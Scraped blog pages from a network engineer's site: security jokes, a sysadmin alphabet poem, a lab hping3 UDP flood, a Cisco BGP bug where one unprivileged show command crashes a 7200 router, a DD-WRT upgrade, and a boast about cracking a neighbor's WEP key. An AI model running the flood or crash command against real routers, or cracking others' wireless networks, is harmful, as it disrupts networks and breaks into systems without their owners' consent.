evilrouters.net

No idea where this originated, but I received it several months ago via e-mail. For your enjoyment…

You know you’re a computer security guy (or girl) when…

• You not only lock your laptop with a physical cable leash, but you change the combination of the lock when it’s not in use so that it can’t be “compromised”.
• Although you have no ill intent, you spend no small amount of your downtime in airports thinking of ways to circumvent TSA security — and you’ve come up with several can’t-miss terrorist ideas that even Jack Bauer couldn’t stop.
• You lock your screensaver with twice as much insistence when security friends are around than when strangers are, because you’re not nearly as worried about a stranger’s intentions.
• You’re immediately discontent with all newly announced security solutions, even before you know anything beyond the name.
• Having extralong passwords that you must type over and over again to get correct is not a bother.
• You have a database program to store all your passwords, but even it doesn’t contain a single, decoded password.
• When you read industry-mandated security guidelines, you chuckle at all the newbie mistakes.
• You secretly hope you don’t miss a big virus outbreak while you are out on vacation.
• Any security book you read is covered in pen from the technical corrections you’ve made.
• Your Internet browser home page is a computer security news bundling Web site.
• You’ve so fine-tuned your personal computer’s host-based firewall that you are sure it is causing problems with legitimate programs, but you really don’t care.
• You fantasize about a job where you could bust into the house of unsuspecting malicious hackers and take them away to jail.
• You’ve got a new car with a built-in GPS and computer, but you are constantly worried about how easy it would be to hack.
• You suspect that every banner and Flash ad on every Web site is hosting malicious JavaScript.
• You loath government interference with the Internet because you know they will only mess it up more and not fix the problem (see CAN-SPAM Act).
• When you hear that we’ve arrested some big spammer, you have the same nonreaction as when you hear we’ve arrested Al-Qaeda’s No. 2 person … again.
• You resist every new application install because of the new attack vector opportunities it will bring.
• You know that mobile small-form-factor computers have almost no security.
• Your cell phone is password-protected.
• You resent having to give out your Social Security number to any person or company, especially because you have never given it when dealing with the Social Security administration.
• You already own or covet one of those special screen covers that prevent people on either side of you of from reading your screen.
• You can’t prevent yourself from laughing out loud when someone announces they think that computer viruses, buffer overflows, or whatever will be solved in five years.
• You hate upgrading your computer because it means spending days trying to copy and convert all your cool hacker and anti-hacker tools to the new system.
• You have solid friends on computer security discussion lists, whom you know would be there for you in a life-crisis pinch but that you’ve never met in person or talked to on the phone.
• Although you never try to shoulder surf other people’s passwords, you can always tell by sound alone when they haven’t typed one that is eight characters or more, and you chuckle inside.
• When someone hands you their USB key to copy something, you always decline, and instead offer your known, clean USB key. You would also prefer one-time, disposable, Tupperware-like memory drives if they existed.
• You always slow down when reading security guidance looking for the words “should,” “must,” “never,” and “always” — and you understand their importance.
• By the time you read a CERT security bulletin, you’ve known about the issue for several days.
• You always investigate SSL certificate errors when they come up in your browser.
• Finally, you know you’re a computer security person when you have so frequently spoken passionately to complete strangers about computer security and the frustration it entails that you know what it’s like to be covered in sweat — and the listening partyto have a look on their face that says they didn’t know what they were in for.

Are there others? Post them in the comments below!

"A" is for Arrogance, properly done.
"B" is for Bastard, the New Zealand one.
"C" is for Cynic, jaded and tired;
    it's also for Caffeine, which keeps us all wired.
"D" for Delete, we'll do it to you;
"E" for 31337, the skr1pt-k1ddie's due.
"F" is for Format(1M), we use it on disks,
"G" is the middle name of the guy who does RISKS.
"H" for the Hubris that makes lusers luse;
"I"'m the Important one, the person who su(8)'s.
"J" is for Jaded, see "C" above;
"K" is for Kill(1), a command we all love.
"L" is for Luser, the sysadmin's bane,
"M" with a "4" keeps the mail gurus sane.
"N" is for No, whatever the question,
"O" is for Octal, the way of permissions.
"P" is for Password, have you changed yours lately?
"Q" is for Quotas, which simplify greatly.
"R" is for Random, a most useful quality,
"S" I can't tell you, it's against policy.
"T" is for TECO, a very old editor,
"U" is for Unix, which has no competitor.
"V" is the System whose Release 4 we wrestle with,
"W" is for W(1), to see who(1) we nestle with.
"X" is the windowing system from Hell,
"Y" do we use it?  The rest suck as well!
"Z" is for Zero, indicating success
    It terminates programs -- and alphabets, yes.

–Unknown

I was bored so decided to play with hping3 a bit tonight.

[jlgaddis@bertram:~]$ sudo hping3 --udp -p 10000 --destport 10000 --flood 192.168.1.12
HPING 192.168.1.12 (eth0 192.168.1.12): udp mode set, 28 headers + 1400 data bytes
hping in flood mode, no replies will be shown

I have the same thing running 192.168.1.12 as well, for “bi-directional” traffic.

c1811# sh int fa7 | in put\ rate
  5 minute input rate 96657000 bits/sec, 8404 packets/sec
  5 minute output rate 93537000 bits/sec, 11389 packets/sec

Two 7200s connected back to back via their serial 2/0 ports. Bring up a link, establish a BGP neighbor relationship between them and then kill your router. The cool thing is, you can even do it from unprivileged mode:

c7200-b# conf t
c7200-b(config)# int loopback 0
*Dec  6 19:36:57.871: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback0, changed state to up
c7200-b(config-if)# ip address 192.168.1.1 255.255.255.0
c7200-b(config-if)# interface serial 2/0
c7200-b(config-if)# ip address 10.0.0.2 255.255.255.252
c7200-b(config-if)# no shutdown
c7200-b(config-if)#
*Dec  6 19:37:13.875: %LINK-3-UPDOWN: Interface Serial2/0, changed state to up
c7200-b(config-if)#
*Dec  6 19:37:13.879: %ENTITY_ALARM-6-INFO: CLEAR INFO Se2/0 Physical Port Administrative State Down 
c7200-b(config-if)#
*Dec  6 19:37:14.883: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial2/0, changed state to up
c7200-b(config-if)# do ping 10.0.0.1

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 10.0.0.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/13/24 ms
c7200-b(config-if)# router bgp 65001
c7200-b(config-router)# neighbor 10.0.0.1 remote-as 65000
c7200-b(config-router)# network 192.168.1.0 mask 255.255.255.0
c7200-b(config-router)# end
c7200-b#
*Dec  6 19:37:36.911: %SYS-5-CONFIG_I: Configured from console by console
c7200-b#
*Dec  6 19:37:40.919: %BGP-5-ADJCHANGE: neighbor 10.0.0.1 Up 
c7200-b# show ip bgp
BGP table version is 3, local router ID is 192.168.1.1
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
              r RIB-failure, S Stale
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop            Metric LocPrf Weight Path
*> 192.168.0.0      10.0.0.1                 0             0 65000 i
*> 192.168.1.0      0.0.0.0                  0         32768 i
c7200-b# exit

Then, while in unprivileged mode…

c7200-b> show ip bgp version 3

…and that’s it. From the other router, we see that it’s down:

c7200-a> ping 10.0.0.2

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 10.0.0.2, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)
c7200-a>

And a moment later we’ll see the BGP adjacency go down:

*Dec  6 19:42:59.419: %BGP-5-ADJCHANGE: neighbor 10.0.0.2 Down Interface flap
c7200-a>

While browsing through my archives tonight, my thoughts went back to the reliable little Buffalo WHR-G125 router/access point over in the corner. Back in January, I wrote about having issues with my MacBook’s wireless and upgrading to — at the time — the latest version of DD-WRT to see if it would help with the issues.

Many months have passed since then and the wireless issues have went away. Unfortunately, I don’t really remember when they went away. I’m not sure if it had anything to do with the firmware upgrade or not.

Regardless, I browsed over to the DD-WRT site again to see if there was newer firmware available. There was, so I decided to upgrade. Upgrading to the latest version was really easy:

[jlgaddis@cleveland ~]$ ssh root@ap
root@ap's password:
root@router:~# cd /tmp
root@router:/tmp# wget http://tinyurl.com/5qv69u
root@router:/tmp# write dd-wrt.v24_vpn_generic.bin linux

At this point, we have a few minutes to kill. The flash memory isn’t the fastest in the world, and it’ll take a bit to save the file to flash. Once it’s done and our prompt has came back back, we just need to reboot.

root@router:/tmp# reboot

Give the router a minute or two to reboot, and we should be able to login again:

[jlgaddis@cleveland ~]$ ssh root@ap
DD-WRT v24 vpn (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)
root@ap's password:
==========================================================

 ____  ___    __        ______ _____         ____  _  _
 | _ \| _ \   \ \      / /  _ \_   _| __   _|___ \| || |
 || | || ||____\ \ /\ / /| |_) || |   \ \ / / __) | || |_
 ||_| ||_||_____\ V  V / |  _ < | |    \ V / / __/|__   _|
 |___/|___/      \_/\_/  |_| \_\|_|     \_/ |_____|  |_|

                       DD-WRT v24
                   http://www.dd-wrt.com

==========================================================


BusyBox v1.11.1 (2008-07-27 16:20:53 CEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

root@router:~# exit
Connection to ap closed.
[jlgaddis@cleveland ~]$

i got bored tonight and, for some reason, decided to get out my trusty old dell laptop that has fedora linux (and, coincidentally, aircrack-ng) on it. as i was getting it, i seen my netgear wg511t wireless card that i bought specifically because it supported packet reinjection. fun ensued.using the somewhat new “ptw method”, i was able to crack a neighbor’s 128-bit wep key in as little as 96 seconds. as i noted on twitter, “even after all the times i’ve done it, i still get such a thrill out of cracking wep”.

…like the nsa headquarters.

thanks to the billboard liberation front!

stan schroeder’s article “richard stallman invents new way of browsing the web” on mashable directed me to this e-mail on the misc@openbsd.org list where stallman (allegedly) states:

for personal reasons, i do not browse the web from my computer. (i also have not net connection much of the time.) to look at page i send mail to a demon which runs wget and mails the page back to me. it is very efficient use of my time, but it is slow in real time.

this took me on a trip down memory lane. i can remember, 13 or 14 years ago, when i had to access the internet via long-distance phone calls (which didn’t please my parents a whole lot). juno came out with a service where they provided free e-mail to anyone (ad supported) and even had a 1-800 number you could use to avoid long-distance charges. the proprietary client would dial up, send any queued mail, downloading any received mail, and disconnect.

some of us discovered that it was possible to access the internet by e-mail. using juno’s free e-mail service, you could construct specially crafted e-mail messages and send them to certain “gateways” to do things like download web pages, perform archie searches, and even ftp files.

ahh, the good ol’ days. =)

a little over three months ago i replaced my aging linksys wrt54g wireless router with a buffalo whr-g125 specifically to run dd-wrt on it. in the last month or so since i got my macbook it will occasionally become disconnected from the wireless network (wpa2/personal) and the only solution would be to hard reboot the whr-g125 (the wired pc’s never lose connectivity). i never had that problem with my dell or toshiba laptops (running windows xp), so i’m inclined to believe that the problem was something to do with the shiny new macbook (note that i could connect to other wireless networks just fine — open access points ftw!).

tonight i wondered if there might be newer firmware available and it just so happened there was. i was running “v24 beta (08/15/07) vpn” and am now running “v24 rc-5 (11/22/07) vpn” so i’ll monitor things for a while and see if it keeps happening. it could be that it was a bug in the previous version, it could be something flaky on my macbook. who knows!?

i’m highly disappointed, to be quite honest. it’s fun to follow the happenings, though.